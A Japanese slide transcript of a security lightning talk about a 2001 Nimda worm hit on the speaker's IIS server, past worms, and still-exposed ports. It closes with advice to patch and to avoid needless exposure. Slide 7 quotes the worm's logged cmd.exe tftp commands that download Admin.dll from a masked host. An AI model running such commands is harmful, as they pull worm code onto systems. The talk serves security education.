あの頃（2000年頃）のインターネット / The Internet in the early 2000s

Transcript

1. あの頃（2000年頃）のインターネット 2025/01/23 Security.any #02 セキュリティあの頃はLT きとう

2. 自己紹介 なまえ • きとう、てきとう、tkito • Twitter: @tkito しゅみ • ゲームしたり海に潜ったり徳を積んだり

   2 おしごと • 企業で社内SOCの中の人とかIRとか あの頃（2000年頃）のインターネット

3. あの頃（2000年頃）のインターネット 3 この先、インターネット老人会的なネタが含まれます

4. 私とパソコンとインターネット この頃はまだセキュリティ専門ではなかった • 高校生の頃 • Windows 95 • ゲームやったり友達と交流したり •

   ISDN • 大学生の頃① • 自作PCを始める • Windows 98 • Linuxをいじり始める • 大学生の頃② • Windows 2000 • IISでサーバを立てて遊ぶ あの頃（2000年頃）のインターネット 4 この辺から21世紀

5. 事件発生 2001年9月18日 • IISのサーバログに変なものが あの頃（2000年頃）のインターネット 5

6. Nimda • 2001年9月に大流行したワーム • IISの脆弱性を突いて感染拡大（複数ある感染経路の一つ） あの頃（2000年頃）のインターネット 6 Insider's Eye：ネットを震撼させたコンピュータ・ワーム、Nimdaを検証する 1．Nimdaの感染原理

   - ＠IT, https://atmarkit.itmedia.co.jp/fwin2k/insiderseye/20010922nimda/nimda_02.html

7. 何があった • アクセスログ • 実行されたコマンド • その他 • 特になし…感染までは至ってなかった？ あの頃（2000年頃）のインターネット

   7 cmd.exe /c dir cmd.exe /c tftp –I *.*.*.* GET Admin.dll c:¥Admin.dll cmd.exe /c tftp –I *.*.*.* GET Admin.dll d:¥Admin.dll cmd.exe /c tftp –I *.*.*.* GET Admin.dll e:¥Admin.dll

8. どうしてこうなった • セキュリティパッチを当ててなかった • 公開の必要がないサーバを公開していた あの頃（2000年頃）のインターネット 8

9. あの頃のワーム騒ぎ • Code Red • 2001年7月に流行 • IISの脆弱性を突いて感染拡大 • SQL

   Slammer • 2003年1月に流行 • Microsoft SQL Serverの脆弱性を突いて感染拡大 • Blaster • 2003年8月流行 • Microsoft RPCの脆弱性を突いて感染拡大 • Sasser • 2004年4月に流行 • SMBの脆弱性を突いて感染拡大 あの頃（2000年頃）のインターネット 9

10. 昔の話でしょ？ • 果たしてそうかな？ あの頃（2000年頃）のインターネット 10

11. Shodanしてみる あの頃（2000年頃）のインターネット 11 Port 445 (SMB) Port 1433 (SQL Server)

12. まとめ • あの頃（2000年頃）のワーム騒ぎの紹介 • 今では過去の話…というわけでもなくインターネットに公開状態のものは多い • パッチはちゃんと当てよう • 公開しないでいいものは公開しないようにしよう あの頃（2000年頃）のインターネット

    12

13. おしまい きとう @tkito 13